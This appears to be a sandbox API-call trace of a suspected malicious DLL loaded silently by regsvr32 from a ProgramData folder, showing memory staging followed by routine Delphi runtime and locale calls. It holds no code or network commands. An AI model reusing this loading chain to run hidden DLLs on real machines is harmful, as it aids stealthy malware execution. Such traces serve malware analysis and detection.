[0085.739] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0xee158, cchData=256 | out: lpLCData="AM") returned 3
[0085.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0xee158, cchData=256 | out: lpLCData="PM") returned 3
[0085.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0xee158, cchData=256 | out: lpLCData="0") returned 2
[0085.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xee158, cchData=256 | out: lpLCData="0") returned 2
[0085.740] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0xee158, cchData=256 | out: lpLCData="0") returned 2
[0085.740] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0xee350, cchData=2 | out: lpLCData=",") returned 2
[0085.740] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x758f0000
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0085.740] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0085.741] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0085.742] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0085.742] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0085.742] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0085.742] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0085.742] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0085.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xc0
[0085.742] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xc4
[0085.742] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xc8
[0085.742] LoadStringW (in: hInstance=0x690000, uID=0xff31, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid time Offset string: %s") returned 0x1e
[0085.743] LoadStringW (in: hInstance=0x690000, uID=0xff30, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid time string: %s") returned 0x17
[0085.743] LoadStringW (in: hInstance=0x690000, uID=0xff4f, lpBuffer=0xec484, cchBufferMax=4096 | out: lpBuffer="Invalid date string: %s") returned 0x17
[0085.743] GetDC (hWnd=0x0) returned 0x2b010799
[0085.743] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0085.743] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.743] GetDC (hWnd=0x0) returned 0x2b010799
[0085.743] GetDeviceCaps (hdc=0x2b010799, index=104) returned 0
[0085.743] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0085.743] CreatePalette (plpal=0xee090) returned 0xd080713
[0085.743] GetStockObject (i=7) returned 0x1b00017
[0085.743] GetStockObject (i=5) returned 0x1900015
[0085.743] GetStockObject (i=13) returned 0x18a002e
[0085.743] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0085.743] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0085.744] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", ulOptions=0x0, samDesired=0x20019, phkResult=0xee370 | out: phkResult=0xee370*=0xcc) returned 0x0
[0085.744] RegQueryValueExW (in: hKey=0xcc, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0xee344, lpData=0x0, lpcbData=0xee35c*=0x0 | out: lpType=0xee344*=0x1, lpData=0x0, lpcbData=0xee35c*=0xe) returned 0x0
[0085.744] RegQueryValueExW (in: hKey=0xcc, lpValueName="MS Shell Dlg 2", lpReserved=0x0, lpType=0xee358, lpData=0x89288c, lpcbData=0xee368*=0xe | out: lpType=0xee358*=0x1, lpData="Tahoma", lpcbData=0xee368*=0xe) returned 0x0
[0085.744] RegCloseKey (hKey=0xcc) returned 0x0
[0085.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Tahoma", cchWideChar=6, lpMultiByteStr=0xee39d, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Tahoma", lpUsedDefaultChar=0x0) returned 6
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.744] GetCurrentThreadId () returned 0xf10
[0085.745] GetCurrentThreadId () returned 0xf10
[0085.745] GetCurrentThreadId () returned 0xf10
[0085.745] GetCurrentThreadId () returned 0xf10
[0085.745] LoadLibraryW (lpLibFileName="c:\\programdata\\tempa\\marxvxinhhm98.dll") returned 0x8f0000
[0085.797] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0085.797] GetProcAddress (hModule=0x75370000, lpProcName="VirtualAlloc") returned 0x753c2fb6
[0085.797] GetProcAddress (hModule=0x75370000, lpProcName="VirtualFree") returned 0x753c1da4
[0085.798] GetProcAddress (hModule=0x75370000, lpProcName="VirtualProtect") returned 0x753b2341
[0085.798] VirtualAlloc (lpAddress=0x0, dwSize=0x1800, flAllocationType=0x1000, flProtect=0x4) returned 0x90000
[0085.798] VirtualAlloc (lpAddress=0x0, dwSize=0xea10e, flAllocationType=0x1000, flProtect=0x4) returned 0x1650000
[0085.959] VirtualFree (lpAddress=0x1650000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.969] VirtualAlloc (lpAddress=0x0, dwSize=0xb0e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.969] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.970] VirtualAlloc (lpAddress=0x0, dwSize=0x450e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.971] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.972] VirtualAlloc (lpAddress=0x0, dwSize=0x1b0e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.972] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.972] VirtualAlloc (lpAddress=0x0, dwSize=0x50e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0085.973] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0085.973] VirtualAlloc (lpAddress=0x0, dwSize=0x1630e, flAllocationType=0x1000, flProtect=0x4) returned 0x160000
[0086.040] SetThreadLocale (Locale=0x400) returned 1
[0086.040] GetVersion () returned 0x1db10106
[0086.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0086.040] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadPreferredUILanguages") returned 0x753b22d7
[0086.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0086.040] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadPreferredUILanguages") returned 0x753ae627
[0086.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0086.040] GetProcAddress (hModule=0x75370000, lpProcName="GetThreadUILanguage") returned 0x753aae42
[0086.040] GetSystemInfo (in: lpSystemInfo=0xee0dc | out: lpSystemInfo=0xee0dc*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0086.040] GetCommandLineW () returned="\"C:\\Windows\\System32\\regsvr32.exe\" /s \"C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll\""
[0086.041] GetStartupInfoW (in: lpStartupInfo=0xee0b8 | out: lpStartupInfo=0xee0b8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\regsvr32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x24a, hStdError=0x1f80))
[0086.041] GetACP () returned 0x4e4
[0086.041] GetCurrentThreadId () returned 0xf10
[0086.041] GetVersion () returned 0x1db10106
[0086.041] GetVersionExW (in: lpVersionInformation=0xedffc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xee048, dwMinorVersion=0xee048, dwBuildNumber=0x1f2ed0, dwPlatformId=0xee0ac, szCSDVersion="\xfa22\x76f7\x70f2\x76f7\x6054\x76f6\x9582\x7532\xffff\xffff\x25") | out: lpVersionInformation=0xedffc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.041] GetModuleFileNameW (in: hModule=0x8f0000, lpFilename=0xebebc, nSize=0x20a | out: lpFilename="c:\\programdata\\tempa\\marxvxinhhm98.dll" (normalized: "c:\\programdata\\tempa\\marxvxinhhm98.dll")) returned 0x26
[0086.041] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xebca6, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.041] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1650000
[0086.041] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xebc20 | out: phkResult=0xebc20*=0x0) returned 0x2
[0086.042] GetUserDefaultUILanguage () returned 0x409
[0086.042] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1
[0086.042] GetThreadUILanguage () returned 0xe0409
[0086.042] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xebbfc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xebc24 | out: pulNumLanguages=0xebbfc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0xebc24) returned 1
[0086.042] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0xebbfc, pwszLanguagesBuffer=0x177a680, pcchLanguagesBuffer=0xebc24 | out: pulNumLanguages=0xebbfc, pwszLanguagesBuffer=0x177a680, pcchLanguagesBuffer=0xebc24) returned 1
[0086.042] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.en-US", lpFindFileData=0xeb9cc | out: lpFindFileData=0xeb9cc) returned 0xffffffff
[0086.043] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.en", lpFindFileData=0xeb9cc | out: lpFindFileData=0xeb9cc) returned 0xffffffff
[0086.043] GetUserDefaultUILanguage () returned 0x409
[0086.043] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0xebc40, cchData=4 | out: lpLCData="ENU") returned 4
[0086.043] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.ENU", lpFindFileData=0xeb9cc | out: lpFindFileData=0xeb9cc) returned 0xffffffff
[0086.043] FindFirstFileW (in: lpFileName="c:\\programdata\\tempa\\marxvxinhhm98.EN", lpFindFileData=0xeb9cc | out: lpFindFileData=0xeb9cc) returned 0xffffffff
[0086.043] LoadStringW (in: hInstance=0x8f0000, uID=0xffcd, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffcc, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffcb, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffca, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffc9, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffc8, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffc6, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffc7, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffd5, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffc2, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffd4, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffef, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffd8, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffd7, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe7, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe8, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe9, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe6, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe4, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe2, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe1, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17
[0086.044] LoadStringW (in: hInstance=0x8f0000, uID=0xffe0, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xffff, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xfffe, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xfffd, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xfffc, lpBuffer=0xec0ec, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xfff5, lpBuffer=0xec0e4, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xffe3, lpBuffer=0xec0e4, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0086.045] GetVersionExW (in: lpVersionInformation=0xedff8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedff8*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.045] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.045] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1f9358
[0086.045] GetProcAddress (hModule=0x75370000, lpProcName="GetNativeSystemInfo") returned 0x753abe77
[0086.045] GetNativeSystemInfo (in: lpSystemInfo=0xedfd4 | out: lpSystemInfo=0xedfd4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xff5c, lpBuffer=0xebfbc, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xff5f, lpBuffer=0xebfbc, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9
[0086.045] LoadStringW (in: hInstance=0x8f0000, uID=0xfffb, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xfffa, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xfff9, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xfff8, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xfff7, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xff8d, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16
[0086.046] LoadStringW (in: hInstance=0x8f0000, uID=0xff6d, lpBuffer=0xec0dc, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20
[0086.046] GetVersionExW (in: lpVersionInformation=0xedfec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0xedfec*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0086.046] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0086.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19
[0086.046] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x17480dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19
[0086.046] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExW") returned 0x753ade40
[0086.046] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xedec2, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0xee0d0 | out: phkResult=0xee0d0*=0x0) returned 0x2
[0086.046] GetThreadLocale () returned 0x409
[0086.047] GetCPInfo (in: CodePage=0x0, lpCPInfo=0xee008 | out: lpCPInfo=0xee008) returned 1
[0086.047] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0086.047] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0086.047] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0086.047] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75370000
[0086.047] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x1f9368
[0086.047] GetProcAddress (hModule=0x75370000, lpProcName="GetLogicalProcessorInformation") returned 0x753a2004
[0086.047] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0xedf60 | out: Buffer=0x0, ReturnedLength=0xedf60) returned 0
[0086.047] GetLastError () returned 0x7a
[0086.047] GetLogicalProcessorInformation (in: Buffer=0x17399d0, ReturnedLength=0xedf60 | out: Buffer=0x17399d0, ReturnedLength=0xedf60) returned 1
[0086.047] GetCurrentThreadId () returned 0xf10
[0086.047] GetCurrentThreadId () returned 0xf10
[0086.047] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0xedd70, cchData=256 | out: lpLCData="2") returned 2
[0086.048] GetThreadLocale () returned 0x409
[0086.048] EnumCalendarInfoW (lpCalInfoEnumProc=0x9157f0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1
[0086.048] GetThreadLocale () returned 0x409
[0086.048] EnumCalendarInfoW (lpCalInfoEnumProc=0x915894, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1
[0086.048] GetCurrentThreadId () returned 0xf10
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Sun") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Sunday") returned 7
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Mon") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Monday") returned 7
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Tue") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Tuesday") returned 8
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Wed") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Wednesday") returned 10
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Thu") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Thursday") returned 9
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Fri") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Friday") returned 7
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Sat") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0xedd6c, cchData=256 | out: lpLCData="Saturday") returned 9
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0xedd70, cchData=256 | out: lpLCData="Jan") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0xedd70, cchData=256 | out: lpLCData="January") returned 8
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0xedd70, cchData=256 | out: lpLCData="Feb") returned 4
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0xedd70, cchData=256 | out: lpLCData="February") returned 9
[0086.048] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0xedd70, cchData=256 | out: lpLCData="Mar") returned 4
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0xedd70, cchData=256 | out: lpLCData="March") returned 6
[0086.049] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0xedd70, cchData=256 | out: lpLCData="Apr") returned 4
